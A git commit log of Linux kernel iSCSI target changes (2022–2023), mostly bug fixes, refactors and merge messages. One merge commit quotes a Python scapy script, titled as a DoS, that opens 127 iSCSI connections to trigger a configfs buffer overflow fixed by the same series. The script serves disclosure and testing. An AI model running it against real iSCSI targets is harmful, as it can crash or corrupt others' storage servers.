Commit Graph

654 Commits

Author SHA1 Message Date
Martin K. Petersen 31799f9e6a Merge patch series "scsi: target: iscsi: Get rid of sprintf in iscsi_target_configfs.c"
Konstantin Shelekhin <k.shelekhin@yadro.com> says:

This patch series cleanses iscsi_target_configfs.c of sprintf
usage. The first patch fixes the real problem, the second just makes
sure we are on the safe side from now on.

I've reproduced the issue fixed in the first patch by utilizing this
cool thing:

  https://git.sr.ht/~kshelekhin/scapy-iscsi

Yeah, shameless promoting of my own tools, but I like the simplicity
of scapy and writing tests in C with libiscsi can be a little
cumbersome.

Check it out:

  #!/usr/bin/env python3
  # Let's cause some DoS in iSCSI target

  import sys

  from scapy.supersocket import StreamSocket
  from scapy_iscsi.iscsi import *

  cpr = {
      "InitiatorName": "iqn.2016-04.com.open-iscsi:e476cd9e4e59",
      "TargetName": "iqn.2023-07.com.example:target",
      "HeaderDigest": "None",
      "DataDigest": "None",
  }

  spr = {
      "SessionType": "Normal",
      "ErrorRecoveryLevel": 0,
      "DefaultTime2Retain": 0,
      "DefaultTime2Wait": 2,
      "ImmediateData": "Yes",
      "FirstBurstLength": 65536,
      "MaxBurstLength": 262144,
      "MaxRecvDataSegmentLength": 262144,
      "MaxOutstandingR2T": 1,
  }

  if len(sys.argv) != 3:
      print("usage: dos.py <host> <port>", file=sys.stderr)
      exit(1)

  host = sys.argv[1]
  port = int(sys.argv[2])
  isid = 0xB00B
  tsih = 0
  connections = []

  for i in range(0, 127):
      s = socket.socket()
      s.connect((host, port))
      s = StreamSocket(s, ISCSI)

      ds = cpr if i > 0 else cpr | spr
      lirq = ISCSI() / LoginRequest(isid=isid, tsih=tsih, cid=i, ds=kv2text(ds))
      lirs = s.sr1(lirq)
      tsih = lirs.tsih

      connections.append(s)

  input()

Link: https://lore.kernel.org/r/20230722152657.168859-1-k.shelekhin@yadro.com
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2023-07-31 12:11:17 -04:00
Konstantin Shelekhin c0431feb0a scsi: target: iscsi: Stop using sprintf() in iscsi_target_configfs.c
Get rid of sprintf() in favor of sysfs_emit(). The latter ensures not to
overflow the given buffer.

Signed-off-by: Konstantin Shelekhin <k.shelekhin@yadro.com>
Link: https://lore.kernel.org/r/20230722152657.168859-3-k.shelekhin@yadro.com
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2023-07-31 12:09:58 -04:00
Konstantin Shelekhin 801f287c93 scsi: target: iscsi: Fix buffer overflow in lio_target_nacl_info_show()
The function lio_target_nacl_info_show() uses sprintf() in a loop to print
details for every iSCSI connection in a session without checking for the
buffer length. With enough iSCSI connections it's possible to overflow the
buffer provided by configfs and corrupt the memory.

This patch replaces sprintf() with sysfs_emit_at() that checks for buffer
boundries.

Signed-off-by: Konstantin Shelekhin <k.shelekhin@yadro.com>
Link: https://lore.kernel.org/r/20230722152657.168859-2-k.shelekhin@yadro.com
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2023-07-31 12:09:58 -04:00
Maurizio Lombardi 30a5b62e1c scsi: target: iscsi: Remove the unused netif_timeout attribute
This attribute has never been used, remove it.

Signed-off-by: Maurizio Lombardi <mlombard@redhat.com>
Link: https://lore.kernel.org/r/20230630155309.46061-1-mlombard@redhat.com
Reviewed-by: Mike Christie <michael.christie@oracle.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2023-07-11 12:33:32 -04:00
Linus Torvalds ca7ce08d6a SCSI misc on 20230629
Updates to the usual drivers (ufs, pm80xx, libata-scsi, smartpqi,
 lpfc, qla2xxx).  We have a couple of major core changes impacting
 other systems: Command Duration Limits, which spills into block and
 ATA and block level Persistent Reservation Operations, which touches
 block, nvme, target and dm (both of which are added with merge commits
 containing a cover letter explaining what's going on).
 
 Signed-off-by: James E.J. Bottomley <jejb@linux.ibm.com>
 -----BEGIN PGP SIGNATURE-----
 
 iJwEABMIAEQWIQTnYEDbdso9F2cI+arnQslM7pishQUCZJ19cSYcamFtZXMuYm90
 dG9tbGV5QGhhbnNlbnBhcnRuZXJzaGlwLmNvbQAKCRDnQslM7pishfZpAQCQBuWR
 ELcOhsaG5KzO6xLWcH8mjsOoxffKvazZjTKXlAD5ATEv7++E250oKS3t+yfjae5I
 Lc195MlDju85ItUQgfk=
 =U9ik
 -----END PGP SIGNATURE-----

Merge tag 'scsi-misc' of git://git.kernel.org/pub/scm/linux/kernel/git/jejb/scsi

Pull SCSI updates from James Bottomley:
 "Updates to the usual drivers (ufs, pm80xx, libata-scsi, smartpqi,
  lpfc, qla2xxx).

  We have a couple of major core changes impacting other systems:

   - Command Duration Limits, which spills into block and ATA

   - block level Persistent Reservation Operations, which touches block,
     nvme, target and dm

  Both of these are added with merge commits containing a cover letter
  explaining what's going on"

* tag 'scsi-misc' of git://git.kernel.org/pub/scm/linux/kernel/git/jejb/scsi: (187 commits)
  scsi: core: Improve warning message in scsi_device_block()
  scsi: core: Replace scsi_target_block() with scsi_block_targets()
  scsi: core: Don't wait for quiesce in scsi_device_block()
  scsi: core: Don't wait for quiesce in scsi_stop_queue()
  scsi: core: Merge scsi_internal_device_block() and device_block()
  scsi: sg: Increase number of devices
  scsi: bsg: Increase number of devices
  scsi: qla2xxx: Remove unused nvme_ls_waitq wait queue
  scsi: ufs: ufs-pci: Add support for Intel Arrow Lake
  scsi: sd: sd_zbc: Use PAGE_SECTORS_SHIFT
  scsi: ufs: wb: Add explicit flush_threshold sysfs attribute
  scsi: ufs: ufs-qcom: Switch to the new ICE API
  scsi: ufs: dt-bindings: qcom: Add ICE phandle
  scsi: ufs: ufs-mediatek: Set UFSHCD_QUIRK_MCQ_BROKEN_RTC quirk
  scsi: ufs: ufs-mediatek: Set UFSHCD_QUIRK_MCQ_BROKEN_INTR quirk
  scsi: ufs: core: Add host quirk UFSHCD_QUIRK_MCQ_BROKEN_RTC
  scsi: ufs: core: Add host quirk UFSHCD_QUIRK_MCQ_BROKEN_INTR
  scsi: ufs: core: Remove dedicated hwq for dev command
  scsi: ufs: core: mcq: Fix the incorrect OCS value for the device command
  scsi: ufs: dt-bindings: samsung,exynos: Drop unneeded quotes
  ...
2023-06-30 11:57:07 -07:00
David Howells d2fe21077d scsi: target: iscsi: Use sendmsg(MSG_SPLICE_PAGES) rather than sendpage
Use sendmsg() with MSG_SPLICE_PAGES rather than sendpage.  This allows
multiple pages and multipage folios to be passed through.

TODO: iscsit_fe_sendpage_sg() should perhaps set up a bio_vec array for the
entire set of pages it's going to transfer plus two for the header and
trailer and page fragments to hold the header and trailer - and then call
sendmsg once for the entire message.

Signed-off-by: David Howells <dhowells@redhat.com>
cc: Mike Christie <michael.christie@oracle.com>
cc: Maurizio Lombardi <mlombard@redhat.com>
cc: "James E.J. Bottomley" <jejb@linux.ibm.com>
cc: "Martin K. Petersen" <martin.petersen@oracle.com>
cc: Jens Axboe <axboe@kernel.dk>
cc: Matthew Wilcox <willy@infradead.org>
cc: Al Viro <viro@zeniv.linux.org.uk>
cc: open-iscsi@googlegroups.com
Link: https://lore.kernel.org/r/20230623225513.2732256-13-dhowells@redhat.com
Signed-off-by: Jakub Kicinski <kuba@kernel.org>
2023-06-24 15:50:13 -07:00
Maurizio Lombardi 2a737d3b8c scsi: target: iscsi: Prevent login threads from racing between each other
The tpg->np_login_sem is a semaphore that is used to serialize the login
process when multiple login threads run concurrently against the same
target portal group.

The iscsi_target_locate_portal() function finds the tpg, calls
iscsit_access_np() against the np_login_sem semaphore and saves the tpg
pointer in conn->tpg;

If iscsi_target_locate_portal() fails, the caller will check for the
conn->tpg pointer and, if it's not NULL, then it will assume that
iscsi_target_locate_portal() called iscsit_access_np() on the semaphore.

Make sure that conn->tpg gets initialized only if iscsit_access_np() was
successful, otherwise iscsit_deaccess_np() may end up being called against
a semaphore we never took, allowing more than one thread to access the same
tpg.

Signed-off-by: Maurizio Lombardi <mlombard@redhat.com>
Link: https://lore.kernel.org/r/20230508162219.1731964-4-mlombard@redhat.com
Reviewed-by: Mike Christie <michael.christie@oracle.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2023-05-22 16:29:39 -04:00
Maurizio Lombardi 13247018d6 scsi: target: iscsi: Fix hang in the iSCSI login code
If the initiator suddenly stops sending data during a login while keeping
the TCP connection open, the login_work won't be scheduled and will never
release the login semaphore; concurrent login operations will therefore get
stuck and fail.

The bug is due to the inability of the login timeout code to properly
handle this particular case.

Fix the problem by replacing the old per-NP login timer with a new
per-connection timer.

The timer is started when an initiator connects to the target; if it
expires, it sends a SIGINT signal to the thread pointed at by the
conn->login_kworker pointer.

conn->login_kworker is set by calling the iscsit_set_login_timer_kworker()
helper, initially it will point to the np thread; When the login
operation's control is in the process of being passed from the NP-thread to
login_work, the conn->login_worker pointer is set to NULL.  Finally,
login_kworker will be changed to point to the worker thread executing the
login_work job.

If conn->login_kworker is NULL when the timer expires, it means that the
login operation hasn't been completed yet but login_work isn't running, in
this case the timer will mark the login process as failed and will schedule
login_work so the latter will be forced to free the resources it holds.

Signed-off-by: Maurizio Lombardi <mlombard@redhat.com>
Link: https://lore.kernel.org/r/20230508162219.1731964-2-mlombard@redhat.com
Reviewed-by: Mike Christie <michael.christie@oracle.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2023-05-22 16:29:39 -04:00
Azeem Shaikh 0871237a94 scsi: target: Replace all non-returning strlcpy() with strscpy()
strlcpy() reads the entire source buffer first.  This read may exceed the
destination size limit.  This is both inefficient and can lead to linear
read overflows if a source string is not NUL-terminated [1].  In an effort
to remove strlcpy() completely [2], replace strlcpy() here with strscpy().
No return values were used, so direct replacement is safe.

[1] https://www.kernel.org/doc/html/latest/process/deprecated.html#strlcpy
[2] https://github.com/KSPP/linux/issues/89

Signed-off-by: Azeem Shaikh <azeemshaikh38@gmail.com>
Link: https://lore.kernel.org/r/20230516025322.2804923-1-azeemshaikh38@gmail.com
Reviewed-by: Kees Cook <keescook@chromium.org>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2023-05-16 21:39:44 -04:00
Martin K. Petersen f467b865cf Merge branch '6.3/scsi-fixes' into 6.4/scsi-staging
Pull in the fixes branch to resolve an mpi3mr conflict reported by
sfr.

Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2023-03-31 21:45:14 -04:00
Dmitry Bogdanov ea87981a0e scsi: target: iscsi: Handle abort for WRITE_PENDING cmds
Sometimes an initiator does not send data for a WRITE command and tries to
abort it. The abort hangs waiting for frontend driver completion. iSCSI
driver waits for data and that timeout eventually initiates connection
reinstatment. The connection closing releases the commands in the
connection, but those aborted commands still did not handle the abort and
did not decrease a command ref counter. Because of that the connection
reinstatement hangs indefinitely and prevents re-login for that initiator.

Add handling in TCM of the abort for the WRITE_PENDING commands at
connection closing moment to make it possible to release them.

Signed-off-by: Dmitry Bogdanov <d.bogdanov@yadro.com>
[mnc: Rebase and expand comment]
Signed-off-by: Mike Christie <michael.christie@oracle.com>
Link: https://lore.kernel.org/r/20230319015620.96006-10-michael.christie@oracle.com
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2023-03-24 17:32:23 -04:00
Mike Christie cc79da306e scsi: target: iscsit: Fix TAS handling during conn cleanup
Fix a bug added in commit f36199355c ("scsi: target: iscsi: Fix cmd abort
fabric stop race").

If CMD_T_TAS is set on the se_cmd we must call iscsit_free_cmd() to do the
last put on the cmd and free it, because the connection is down and we will
not up sending the response and doing the put from the normal I/O
path.

Add a check for CMD_T_TAS in iscsit_release_commands_from_conn() so we now
detect this case and run iscsit_free_cmd().

Fixes: f36199355c ("scsi: target: iscsi: Fix cmd abort fabric stop race")
Signed-off-by: Mike Christie <michael.christie@oracle.com>
Link: https://lore.kernel.org/r/20230319015620.96006-9-michael.christie@oracle.com
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2023-03-24 17:32:23 -04:00
Dmitry Bogdanov d8990b5a4d scsi: target: iscsit: Free cmds before session free
Commands from recovery entries are freed after session has been closed.
That leads to use-after-free at command free or NPE with such call trace:

Time2Retain timer expired for SID: 1, cleaning up iSCSI session.
BUG: kernel NULL pointer dereference, address: 0000000000000140
RIP: 0010:sbitmap_queue_clear+0x3a/0xa0
Call Trace:
 target_release_cmd_kref+0xd1/0x1f0 [target_core_mod]
 transport_generic_free_cmd+0xd1/0x180 [target_core_mod]
 iscsit_free_cmd+0x53/0xd0 [iscsi_target_mod]
 iscsit_free_connection_recovery_entries+0x29d/0x320 [iscsi_target_mod]
 iscsit_close_session+0x13a/0x140 [iscsi_target_mod]
 iscsit_check_post_dataout+0x440/0x440 [iscsi_target_mod]
 call_timer_fn+0x24/0x140

Move cleanup of recovery enrties to before session freeing.

Reported-by: Forza <forza@tnonline.net>
Signed-off-by: Dmitry Bogdanov <d.bogdanov@yadro.com>
Signed-off-by: Mike Christie <michael.christie@oracle.com>
Link: https://lore.kernel.org/r/20230319015620.96006-7-michael.christie@oracle.com
Reviewed-by: Maurizio Lombardi <mlombard@redhat.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2023-03-24 17:32:23 -04:00
Mike Christie 395cee83d0 scsi: target: iscsit: Stop/wait on cmds during conn close
This fixes a bug added in commit f36199355c ("scsi: target: iscsi: Fix
cmd abort fabric stop race").

If we have multiple sessions to the same se_device we can hit a race where
a LUN_RESET on one session cleans up the se_cmds from under another
session which is being closed. This results in the closing session freeing
its conn/session structs while they are still in use.

The bug is:

 1. Session1 has IO se_cmd1.

 2. Session2 can also have se_cmds for I/O and optionally TMRs for ABORTS
    but then gets a LUN_RESET.

 3. The LUN_RESET on session2 sees the se_cmds on session1 and during the
    drain stages marks them all with CMD_T_ABORTED.

 4. session1 is now closed so iscsit_release_commands_from_conn() only sees
    se_cmds with the CMD_T_ABORTED bit set and returns immediately even
    though we have outstanding commands.

 5. session1's connection and session are freed.

 6. The backend request for se_cmd1 completes and it accesses the freed
    connection/session.

This hooks the iscsit layer into the cmd counter code, so we can wait for
all outstanding se_cmds before freeing the connection.

Fixes: f36199355c ("scsi: target: iscsi: Fix cmd abort fabric stop race")
Signed-off-by: Mike Christie <michael.christie@oracle.com>
Link: https://lore.kernel.org/r/20230319015620.96006-6-michael.christie@oracle.com
Reviewed-by: Maurizio Lombardi <mlombard@redhat.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2023-03-24 17:32:23 -04:00
Mike Christie 6d256bee60 scsi: target: iscsit: isert: Alloc per conn cmd counter
This has iscsit allocate a per conn cmd counter and converts iscsit/isert
to use it instead of the per session one.

Signed-off-by: Mike Christie <michael.christie@oracle.com>
Link: https://lore.kernel.org/r/20230319015620.96006-5-michael.christie@oracle.com
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2023-03-24 17:32:23 -04:00
Mike Christie 8e288be860 scsi: target: Pass in cmd counter to use during cmd setup
Allow target_get_sess_cmd() users to pass in the cmd counter they want to
use. Right now we pass in the session's cmd counter but in a subsequent
commit iSCSI will switch from per session to per conn.

Signed-off-by: Mike Christie <michael.christie@oracle.com>
Link: https://lore.kernel.org/r/20230319015620.96006-4-michael.christie@oracle.com
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2023-03-24 17:32:23 -04:00
Mike Christie 4edba7e4a8 scsi: target: Move cmd counter allocation
iSCSI needs to allocate its cmd counter per connection for MCS support
where we need to stop and wait on commands running on a connection instead
of per session. This moves the cmd counter allocation to
target_setup_session() which is used by drivers that need the stop+wait
behavior per session.

xcopy doesn't need stop+wait at all, so we will be OK moving the cmd
counter allocation outside of transport_init_session().

Signed-off-by: Mike Christie <michael.christie@oracle.com>
Link: https://lore.kernel.org/r/20230319015620.96006-3-michael.christie@oracle.com
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2023-03-24 17:32:23 -04:00
Maurizio Lombardi 6cc55c969b scsi: target: iscsi: Fix an error message in iscsi_check_key()
The first half of the error message is printed by pr_err(), the second half
is printed by pr_debug(). The user will therefore see only the first part
of the message and will miss some useful information.

Link: https://lore.kernel.org/r/20230214141556.762047-1-mlombard@redhat.com
Signed-off-by: Maurizio Lombardi <mlombard@redhat.com>
Reviewed-by: Mike Christie <michael.christie@oracle.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2023-03-06 16:50:42 -05:00
Peilin Ye 40e0b09081 net/sock: Introduce trace_sk_data_ready()
As suggested by Cong, introduce a tracepoint for all ->sk_data_ready()
callback implementations.  For example:

<...>
  iperf-609  [002] .....  70.660425: sk_data_ready: family=2 protocol=6 func=sock_def_readable
  iperf-609  [002] .....  70.660436: sk_data_ready: family=2 protocol=6 func=sock_def_readable
<...>

Suggested-by: Cong Wang <cong.wang@bytedance.com>
Signed-off-by: Peilin Ye <peilin.ye@bytedance.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2023-01-23 11:26:50 +00:00
Linus Torvalds aa5ad10f6c SCSI misc on 20221213
Updates to the usual drivers (target, ufs, smartpqi, lpfc).  There are
 some core changes, mostly around reworking some of our user context
 assumptions in device put and moving some code around.  The remaining
 updates are bug fixes and minor changes.
 
 Signed-off-by: James E.J. Bottomley <jejb@linux.ibm.com>
 -----BEGIN PGP SIGNATURE-----
 
 iJwEABMIAEQWIQTnYEDbdso9F2cI+arnQslM7pishQUCY5jjrSYcamFtZXMuYm90
 dG9tbGV5QGhhbnNlbnBhcnRuZXJzaGlwLmNvbQAKCRDnQslM7pishR9iAPwN++uF
 BNlCD36duS8LslKQMPAmFxWt3d/4RWAHsXj2WQEAtu9q8K9PSe1ueb4y+rAEG4oj
 2AUQhR3v9ciWBBKlDog=
 =JYJC
 -----END PGP SIGNATURE-----

Merge tag 'scsi-misc' of git://git.kernel.org/pub/scm/linux/kernel/git/jejb/scsi

Pull SCSI updates from James Bottomley:
 "Updates to the usual drivers (target, ufs, smartpqi, lpfc).

  There are some core changes, mostly around reworking some of our user
  context assumptions in device put and moving some code around.

  The remaining updates are bug fixes and minor changes"

* tag 'scsi-misc' of git://git.kernel.org/pub/scm/linux/kernel/git/jejb/scsi: (138 commits)
  scsi: sg: Fix get_user() in call sg_scsi_ioctl()
  scsi: megaraid_sas: Fix some spelling mistakes in comment
  scsi: core: Use SCSI_SCAN_INITIAL in do_scsi_scan_host()
  scsi: core: Use SCSI_SCAN_RESCAN in __scsi_add_device()
  scsi: ufs: ufs-mediatek: Remove unnecessary return code
  scsi: ufs: core: Fix the polling implementation
  scsi: libsas: Do not export sas_ata_wait_after_reset()
  scsi: hisi_sas: Fix SATA devices missing issue during I_T nexus reset
  scsi: libsas: Add smp_ata_check_ready_type()
  scsi: Revert "scsi: hisi_sas: Don't send bcast events from HW during nexus HA reset"
  scsi: Revert "scsi: hisi_sas: Drain bcast events in hisi_sas_rescan_topology()"
  scsi: ufs: ufs-mediatek: Modify the return value
  scsi: ufs: ufs-mediatek: Remove unneeded code
  scsi: device_handler: alua: Call scsi_device_put() from non-atomic context
  scsi: device_handler: alua: Revert "Move a scsi_device_put() call out of alua_check_vpd()"
  scsi: snic: Fix possible UAF in snic_tgt_create()
  scsi: qla2xxx: Initialize vha->unknown_atio_[list, work] for NPIV hosts
  scsi: qla2xxx: Remove duplicate of vha->iocb_work initialization
  scsi: fcoe: Fix transport not deattached when fcoe_if_init() fails
  scsi: sd: Use 16-byte SYNCHRONIZE CACHE on ZBC devices
  ...
2022-12-14 08:58:51 -08:00
Al Viro de4eda9de2 use less confusing names for iov_iter direction initializers
READ/WRITE proved to be actively confusing - the meanings are
"data destination, as used with read(2)" and "data source, as
used with write(2)", but people keep interpreting those as
"we read data from it" and "we write data to it", i.e. exactly
the wrong way.

Call them ITER_DEST and ITER_SOURCE - at least that is harder
to misinterpret...

Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
2022-11-25 13:01:55 -05:00
Maurizio Lombardi fec1b2fa62 scsi: target: iscsi: Fix a race condition between login_work and the login thread
In case a malicious initiator sends some random data immediately after a
login PDU; the iscsi_target_sk_data_ready() callback will schedule the
login_work and, at the same time, the negotiation may end without clearing
the LOGIN_FLAGS_INITIAL_PDU flag (because no additional PDU exchanges are
required to complete the login).

The login has been completed but the login_work function will find the
LOGIN_FLAGS_INITIAL_PDU flag set and will never stop from rescheduling
itself; at this point, if the initiator drops the connection, the
iscsit_conn structure will be freed, login_work will dereference a released
socket structure and the kernel crashes.

BUG: kernel NULL pointer dereference, address: 0000000000000230
PF: supervisor write access in kernel mode
PF: error_code(0x0002) - not-present page
Workqueue: events iscsi_target_do_login_rx [iscsi_target_mod]
RIP: 0010:_raw_read_lock_bh+0x15/0x30
Call trace:
 iscsi_target_do_login_rx+0x75/0x3f0 [iscsi_target_mod]
 process_one_work+0x1e8/0x3c0

Fix this bug by forcing login_work to stop after the login has been
completed and the socket callbacks have been restored.

Add a comment to clearify the return values of iscsi_target_do_login()

Signed-off-by: Maurizio Lombardi <mlombard@redhat.com>
Link: https://lore.kernel.org/r/20221115125638.102517-1-mlombard@redhat.com
Reviewed-by: Mike Christie <michael.christie@oracle.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2022-11-24 03:22:53 +00:00
Jason A. Donenfeld a251c17aa5 treewide: use get_random_u32() when possible
The prandom_u32() function has been a deprecated inline wrapper around
get_random_u32() for several releases now, and compiles down to the
exact same code. Replace the deprecated wrapper with a direct call to
the real function. The same also applies to get_random_int(), which is
just a wrapper around get_random_u32(). This was done as a basic find
and replace.

Reviewed-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Reviewed-by: Kees Cook <keescook@chromium.org>
Reviewed-by: Yury Norov <yury.norov@gmail.com>
Reviewed-by: Jan Kara <jack@suse.cz> # for ext4
Acked-by: Toke Høiland-Jørgensen <toke@toke.dk> # for sch_cake
Acked-by: Chuck Lever <chuck.lever@oracle.com> # for nfsd
Acked-by: Jakub Kicinski <kuba@kernel.org>
Acked-by: Mika Westerberg <mika.westerberg@linux.intel.com> # for thunderbolt
Acked-by: Darrick J. Wong <djwong@kernel.org> # for xfs
Acked-by: Helge Deller <deller@gmx.de> # for parisc
Acked-by: Heiko Carstens <hca@linux.ibm.com> # for s390
Signed-off-by: Jason A. Donenfeld <Jason@zx2c4.com>
2022-10-11 17:42:58 -06:00
Dmitry Bogdanov 292cef5e62 scsi: target: iscsi: Do not require target authentication
RFC7143 states that Initiator decides what type of authentication to
use:

The initiator MUST continue with:
    CHAP_N=<N> CHAP_R=<R>
or, if it requires target authentication, with:
    CHAP_N=<N> CHAP_R=<R> CHAP_I=<I> CHAP_C=<C>

Allow one way authentication if mutual authentication is configured.  That
passes some tests from Windows HLK for Mutual CHAP with iSNS.

Link: https://lore.kernel.org/r/20220718152555.17084-5-d.bogdanov@yadro.com
Reviewed-by: Mike Christie <michael.christie@oracle.com>
Signed-off-by: Dmitry Bogdanov <d.bogdanov@yadro.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2022-07-26 22:13:29 -04:00
Dmitry Bogdanov e52b904b49 scsi: target: iscsi: Allow AuthMethod=None
Allow negotiating AuthMethod=None at CSG=0 (Security Negotiation) when
authentication is not required. That is required by the CHAP test in
Windows HLK.

Link: https://lore.kernel.org/r/20220718152555.17084-4-d.bogdanov@yadro.com
Reviewed-by: Mike Christie <michael.christie@oracle.com>
Signed-off-by: Dmitry Bogdanov <d.bogdanov@yadro.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2022-07-26 22:13:28 -04:00
Dmitry Bogdanov 1e57338834 scsi: target: iscsi: Support base64 in CHAP
RFC7143 allows both Base64 and Hex encoding for CHAP binary entities like
Challenge and Response. Currently the Linux iSCSI target supports only Hex
encoding.

Add support for Base64 encoded CHAP Challenge and CHAP Response required
for CHAP tests in Windows HLK.

Link: https://lore.kernel.org/r/20220718152555.17084-3-d.bogdanov@yadro.com
Reviewed-by: Mike Christie <michael.christie@oracle.com>
Signed-off-by: Dmitry Bogdanov <d.bogdanov@yadro.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2022-07-26 22:13:28 -04:00
Dmitry Bogdanov 8f1f7d297b scsi: target: iscsi: Add support for extended CDB AHS
Variable length SCSI commands are transferred over iSCSI via two CDB
buffers - in Basic Header Segment and in Additional Header Segment (AHS).
Since AHS is not supported yet, a target reads just BHS (48 byte) from TCP
and treats the remaining octets as a next new iSCSI PDU that causes
protocol errors.

Add support for the Extended CDB AHS type.

Link: https://lore.kernel.org/r/20220718152555.17084-2-d.bogdanov@yadro.com
Reviewed-by: Mike Christie <michael.christie@oracle.com>
Signed-off-by: Dmitry Bogdanov <d.bogdanov@yadro.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2022-07-26 22:13:28 -04:00
Justin Stitt 71b25693b2 scsi: target: iscsi: Fix clang -Wformat warnings
When building with Clang we encounter these warnings:
| drivers/target/iscsi/iscsi_target_login.c:719:24: error: format
| specifies type 'unsigned short' but the argument has type 'int'
| [-Werror,-Wformat] " from node: %s\n", atomic_read(&sess->nconn),
-
| drivers/target/iscsi/iscsi_target_login.c:767:12: error: format
| specifies type 'unsigned short' but the argument has type 'int'
| [-Werror,-Wformat] " %s\n", atomic_read(&sess->nconn),
-
| drivers/target/iscsi/iscsi_target.c:4365:12: error: format specifies
| type 'unsigned short' but the argument has type 'int' [-Werror,-Wformat]
| " %s\n", atomic_read(&sess->nconn)

For all warnings, the format specifier is '%hu' which describes an unsigned
short. The resulting type of atomic_read is an int. The proposed fix is to
listen to Clang and swap the format specifier.

Link: https://github.com/ClangBuiltLinux/linux/issues/378
Link: https://lore.kernel.org/r/20220718180421.49697-1-justinstitt@google.com
Reviewed-by: Nick Desaulniers <ndesaulniers@google.com>
Reviewed-by: Chaitanya Kulkarni <kch@nvidia.com>
Signed-off-by: Justin Stitt <justinstitt@google.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2022-07-18 23:04:12 -04:00
Yang Li 35bf020bd8 scsi: target: iscsi: Fix NULL pointer dereference in iscsi_conn_auth_required()
Fix following coccicheck error:

./drivers/target/iscsi/iscsi_target_nego.c:831:13-26: ERROR: se_nacl is NULL but dereferenced.

Link: https://lore.kernel.org/r/20220613014321.107045-1-yang.lee@linux.alibaba.com
Fixes: a75fcb0912 ("scsi: target: iscsi: Extract auth functions")
Reported-by: Abaci Robot <abaci@linux.alibaba.com>
Reviewed-by: Mike Christie <michael.christie@oracle.com>
Signed-off-by: Yang Li <yang.lee@linux.alibaba.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2022-06-16 21:23:18 -04:00
Dmitry Bogdanov a6e0d17976 scsi: target: iscsi: Control authentication per ACL
Add acls/{ACL}/attrib/authentication attribute that controls authentication
for particular ACL. By default, this attribute inherits a value of the
authentication attribute of the target port group to keep backward
compatibility.

Authentication attribute has 3 states:

 "0" - authentication is turned off for this ACL

 "1" - authentication is required for this ACL

 "-1" - authentication is inherited from TPG

Link: https://lore.kernel.org/r/20220523095905.26070-4-d.bogdanov@yadro.com
Reviewed-by: Roman Bolshakov <r.bolshakov@yadro.com>
Reviewed-by: Konstantin Shelekhin <k.shelekhin@yadro.com>
Reviewed-by: Mike Christie <michael.christie@oracle.com>
Signed-off-by: Dmitry Bogdanov <d.bogdanov@yadro.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2022-06-07 21:55:11 -04:00
Dmitry Bogdanov a75fcb0912 scsi: target: iscsi: Extract auth functions
Create functions that answers simple questions: Whether authentication is
required, what credentials, whether connection is autenticated.

Link: https://lore.kernel.org/r/20220523095905.26070-3-d.bogdanov@yadro.com
Reviewed-by: Roman Bolshakov <r.bolshakov@yadro.com>
Reviewed-by: Konstantin Shelekhin <k.shelekhin@yadro.com>
Reviewed-by: Mike Christie <michael.christie@oracle.com>
Reviewed-by: Lee Duncan <lduncan@suse.com>
Signed-off-by: Dmitry Bogdanov <d.bogdanov@yadro.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2022-06-07 21:55:11 -04:00
Dmitry Bogdanov a11b80692b scsi: target: iscsi: Add upcast helpers
iSCSI target is cluttered with open-coded container_of() conversions from
se_nacl to iscsi_node_acl. The code could be cleaned by introducing a
helper - to_iscsi_nacl() (similar to other helpers in target core).

While at it, make another iSCSI conversion helper consistent and rename
iscsi_tpg() helper to to_iscsi_tpg().

Link: https://lore.kernel.org/r/20220523095905.26070-2-d.bogdanov@yadro.com
Reviewed-by: Roman Bolshakov <r.bolshakov@yadro.com>
Reviewed-by: Konstantin Shelekhin <k.shelekhin@yadro.com>
Reviewed-by: Mike Christie <michael.christie@oracle.com>
Reviewed-by: Lee Duncan <lduncan@suse.com>
Signed-off-by: Dmitry Bogdanov <d.bogdanov@yadro.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2022-06-07 21:55:11 -04:00
Linus Torvalds fbe86daca0 SCSI misc on 20220524
This series consists of a small set of driver updates (lpfc, ufs,
 mpt3sas mpi3mr, iscsi target).  Apart from that this is mostly small
 fixes with very few core changes (the biggest one being VPD caching.
 
 Signed-off-by: James E.J. Bottomley <jejb@linux.ibm.com>
 -----BEGIN PGP SIGNATURE-----
 
 iJwEABMIAEQWIQTnYEDbdso9F2cI+arnQslM7pishQUCYo2WnyYcamFtZXMuYm90
 dG9tbGV5QGhhbnNlbnBhcnRuZXJzaGlwLmNvbQAKCRDnQslM7pishfEiAP4zvniL
 xidsiCXGQ4pWF4QW3UxukXpGh5xFREhNCYT9+QEA+DyilCALOI+ZT5GKu2V6gkby
 R29ve48/NAWl3fwYjMQ=
 =GPL1
 -----END PGP SIGNATURE-----

Merge tag 'scsi-misc' of git://git.kernel.org/pub/scm/linux/kernel/git/jejb/scsi

Pull SCSI updates from James Bottomley:
